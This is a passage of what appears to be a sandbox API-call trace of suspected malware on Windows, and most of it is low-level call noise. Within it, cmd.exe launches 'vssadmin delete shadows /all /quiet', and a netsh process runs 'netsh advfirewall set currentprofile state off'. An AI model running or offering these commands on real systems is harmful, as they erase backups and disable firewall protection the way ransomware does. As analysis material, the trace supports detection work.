lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.682] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.683] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce364, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0046.683] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.683] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.683] ReadFile (in: hFile=0xa0, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x16fa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x16fa58*=0x1, lpOverlapped=0x0) returned 1 [0046.683] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0046.684] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.684] GetFileType (hFile=0xa0) returned 0x3 [0046.684] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.684] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.684] _get_osfhandle (_FileHandle=1) returned 0xec [0046.684] GetFileType (hFile=0xec) returned 0x3 [0046.684] _get_osfhandle (_FileHandle=1) returned 0xec [0046.684] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0046.684] WriteFile (in: hFile=0xec, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x16fa38, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x16fa38*=0x24, lpOverlapped=0x0) returned 1 [0046.684] GetProcessHeap () returned 0x290000 [0046.684] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x4012) returned 0x2acd20 [0046.684] GetProcessHeap () returned 0x290000 [0046.684] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2acd20 | out: hHeap=0x290000) returned 1 [0046.685] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0046.685] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0046.685] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0046.685] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0046.685] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0046.685] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0046.685] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0046.685] GetProcessHeap () returned 0x290000 [0046.685] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0xb0) returned 0x2a97e0 [0046.685] GetProcessHeap () returned 0x290000 [0046.685] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x22) returned 0x2a4610 [0046.686] GetProcessHeap () returned 0x290000 [0046.686] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x48) returned 0x2a98a0 [0046.687] GetConsoleOutputCP () returned 0x1b5 [0046.687] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4cbfe0 | out: lpCPInfo=0x4a4cbfe0) returned 1 [0046.687] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0046.687] GetConsoleTitleW (in: lpConsoleTitle=0x16f9f0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0046.688] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0046.688] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0046.688] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0046.688] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0046.688] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0046.688] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0046.688] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0046.688] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0046.688] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0046.688] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0046.688] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0046.688] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0046.688] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0046.688] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0046.688] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0046.688] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0046.688] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0046.688] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0046.688] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0046.688] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0046.688] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0046.688] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0046.688] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0046.688] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0046.688] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0046.688] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0046.688] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0046.688] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0046.688] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0046.689] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0046.689] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0046.689] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0046.689] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0046.689] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0046.689] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0046.689] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0046.689] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0046.689] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0046.689] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0046.689] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0046.689] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0046.689] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0046.689] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0046.689] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0046.689] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0046.689] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0046.689] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0046.689] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0046.689] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0046.689] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0046.689] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0046.689] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0046.689] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0046.689] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0046.689] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0046.689] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0046.689] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0046.689] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0046.689] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0046.689] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0046.689] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0046.689] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0046.689] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0046.689] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0046.689] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0046.689] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0046.689] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0046.689] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0046.689] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0046.690] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0046.690] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0046.690] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0046.690] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0046.690] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0046.690] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0046.690] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0046.690] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0046.690] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0046.690] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0046.690] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0046.690] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0046.690] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0046.690] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0046.690] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0046.690] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0046.690] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0046.690] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0046.690] GetProcessHeap () returned 0x290000 [0046.690] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x218) returned 0x291ab0 [0046.690] GetProcessHeap () returned 0x290000 [0046.690] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x5a) returned 0x291cd0 [0046.690] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0046.691] GetProcessHeap () returned 0x290000 [0046.691] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x420) returned 0x2a9a80 [0046.691] SetErrorMode (uMode=0x0) returned 0x0 [0046.691] SetErrorMode (uMode=0x1) returned 0x0 [0046.691] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2a9a90, lpFilePart=0x16f280 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16f280*="Desktop") returned 0x25 [0046.691] SetErrorMode (uMode=0x0) returned 0x1 [0046.691] GetProcessHeap () returned 0x290000 [0046.691] RtlReAllocateHeap (Heap=0x290000, Flags=0x0, Ptr=0x2a9a80, Size=0x6e) returned 0x2a9a80 [0046.691] GetProcessHeap () returned 0x290000 [0046.691] RtlSizeHeap (HeapHandle=0x290000, Flags=0x0, MemoryPointer=0x2a9a80) returned 0x6e [0046.691] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.691] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.691] GetProcessHeap () returned 0x290000 [0046.691] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x128) returned 0x2a5b70 [0046.691] GetProcessHeap () returned 0x290000 [0046.691] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x240) returned 0x2a9b00 [0046.695] GetProcessHeap () returned 0x290000 [0046.695] RtlReAllocateHeap (Heap=0x290000, Flags=0x0, Ptr=0x2a9b00, Size=0x12a) returned 0x2a9b00 [0046.695] GetProcessHeap () returned 0x290000 [0046.695] RtlSizeHeap (HeapHandle=0x290000, Flags=0x0, MemoryPointer=0x2a9b00) returned 0x12a [0046.696] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.696] GetProcessHeap () returned 0x290000 [0046.696] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0xe8) returned 0x2a9c40 [0046.696] GetProcessHeap () returned 0x290000 [0046.696] RtlReAllocateHeap (Heap=0x290000, Flags=0x0, Ptr=0x2a9c40, Size=0x7e) returned 0x2a9c40 [0046.696] GetProcessHeap () returned 0x290000 [0046.696] RtlSizeHeap (HeapHandle=0x290000, Flags=0x0, MemoryPointer=0x2a9c40) returned 0x7e [0046.703] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.703] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x16eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16eff0) returned 0xffffffffffffffff [0046.703] GetLastError () returned 0x2 [0046.703] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x16eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16eff0) returned 0xffffffffffffffff [0046.704] GetLastError () returned 0x2 [0046.704] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.704] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x16eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16eff0) returned 0x291d40 [0046.704] GetProcessHeap () returned 0x290000 [0046.704] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x28) returned 0x2a4640 [0046.704] FindClose (in: hFindFile=0x291d40 | out: hFindFile=0x291d40) returned 1 [0046.704] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x16eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16eff0) returned 0xffffffffffffffff [0046.704] GetLastError () returned 0x2 [0046.704] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x16eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16eff0) returned 0x291d40 [0046.704] GetProcessHeap () returned 0x290000 [0046.704] RtlReAllocateHeap (Heap=0x290000, Flags=0x0, Ptr=0x2a4640, Size=0x8) returned 0x2a98f0 [0046.704] FindClose (in: hFindFile=0x291d40 | out: hFindFile=0x291d40) returned 1 [0046.704] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0046.704] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0046.704] GetConsoleTitleW (in: lpConsoleTitle=0x16f540, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0046.705] GetProcessHeap () returned 0x290000 [0046.705] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x21c) returned 0x2a9cd0 [0046.705] GetConsoleTitleW (in: lpConsoleTitle=0x2a9ce0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0046.705] GetProcessHeap () returned 0x290000 [0046.705] RtlReAllocateHeap (Heap=0x290000, Flags=0x0, Ptr=0x2a9cd0, Size=0xc0) returned 0x2a9cd0 [0046.705] GetProcessHeap () returned 0x290000 [0046.705] RtlSizeHeap (HeapHandle=0x290000, Flags=0x0, MemoryPointer=0x2a9cd0) returned 0xc0 [0046.705] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0046.707] GetProcessHeap () returned 0x290000 [0046.707] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2a9cd0 | out: hHeap=0x290000) returned 1 [0046.707] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f2f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f2b8 | out: lpAttributeList=0x16f2f8, lpSize=0x16f2b8) returned 1 [0046.707] UpdateProcThreadAttribute (in: lpAttributeList=0x16f2f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f2f8, lpPreviousValue=0x0) returned 1 [0046.707] GetStartupInfoW (in: lpStartupInfo=0x16f410 | out: lpStartupInfo=0x16f410*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xa0, hStdOutput=0xec, hStdError=0xec)) [0046.707] GetProcessHeap () returned 0x290000 [0046.707] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x20) returned 0x2a4640 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.707] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.708] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.708] GetProcessHeap () returned 0x290000 [0046.708] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2a4640 | out: hHeap=0x290000) returned 1 [0046.708] GetProcessHeap () returned 0x290000 [0046.708] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x12) returned 0x2a8900 [0046.708] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x16f330*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f2e0 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x16f2e0*(hProcess=0x54, hThread=0x50, dwProcessId=0x9e8, dwThreadId=0x9ec)) returned 1 [0046.761] CloseHandle (hObject=0x50) returned 1 [0046.761] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0046.761] GetProcessHeap () returned 0x290000 [0046.761] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2ac230 | out: hHeap=0x290000) returned 1 [0046.761] GetEnvironmentStringsW () returned 0x2aaa10* [0046.761] GetProcessHeap () returned 0x290000 [0046.762] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0xae8) returned 0x2ab500 [0046.762] FreeEnvironmentStringsW (penv=0x2aaa10) returned 1 [0046.762] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x76f50000 [0046.762] GetProcAddress (hModule=0x76f50000, lpProcName="NtQueryInformationProcess") returned 0x76fa14a0 [0046.762] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x16ebe8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x16ebe8, ReturnLength=0x0) returned 0x0 [0046.762] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdf000, lpBuffer=0x16ec20, nSize=0x380, lpNumberOfBytesRead=0x16ebe0 | out: lpBuffer=0x16ec20*, lpNumberOfBytesRead=0x16ebe0*=0x380) returned 1 [0046.762] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) Process: id = "5" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x1d66d000" os_pid = "0x9e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x9c0" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 15 os_tid = 0x9ec Thread: id = 17 os_tid = 0x9f8 Thread: id = 18 os_tid = 0x9fc Thread: id = 19 os_tid = 0xa00 Thread: id = 20 os_tid = 0xa04 Process: id = "6" image_name = "netsh.exe" filename = "c:\\windows\\system32\\netsh.exe" page_root = "0x40f000" os_pid = "0x9f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9b8" cmd_line = "netsh advfirewall set currentprofile state off" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 16 os_tid = 0x9f4 [0047.925] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fab0 | out: lpSystemTimeAsFileTime=0x28fab0*(dwLowDateTime=0xf1c33b00, dwHighDateTime=0x1d4f17e)) [0047.925] GetCurrentProcessId () returned 0x9f0 [0047.925] GetCurrentThreadId () returned 0x9f4 [0047.925] GetTickCount () returned 0x1b6c0 [0047.925] QueryPerformanceCounter (in: lpPerformanceCount=0x28fab8 | out: lpPerformanceCount=0x28fab8*=16773394601) returned 1 [0047.926] GetModuleHandleW (lpModuleName=0x0) returned 0x17e0000 [0047.926] __set_app_type (_Type=0x1) [0047.926] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x17ead14) returned 0x0 [0047.926] __wgetmainargs (in: _Argc=0x17f55c0, _Argv=0x17f55d0, _Env=0x17f55c8, _DoWildCard=0, _StartInfo=0x17f55dc | out: _Argc=0x17f55c0, _Argv=0x17f55d0, _Env=0x17f55c8) returned 0 [0047.927] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0047.928] GetModuleHandleW (lpModuleName=0x0) returned 0x17e0000 [0047.928] _vsnwprintf (in: _Buffer=0x17f7a40, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x287608 | out: _Buffer="netsh>") returned 6 [0047.928] GetProcessHeap () returned 0x360000 [0047.928] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3807d0 [0047.928] GetProcessHeap () returned 0x360000 [0047.928] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3807f0 [0047.928] GetProcessHeap () returned 0x360000 [0047.928] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380810 [0047.928] GetProcessHeap () returned 0x360000 [0047.928] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380830 [0047.928] GetProcessHeap () returned 0x360000 [0047.928] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380850 [0047.928] GetProcessHeap () returned 0x360000 [0047.928] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, 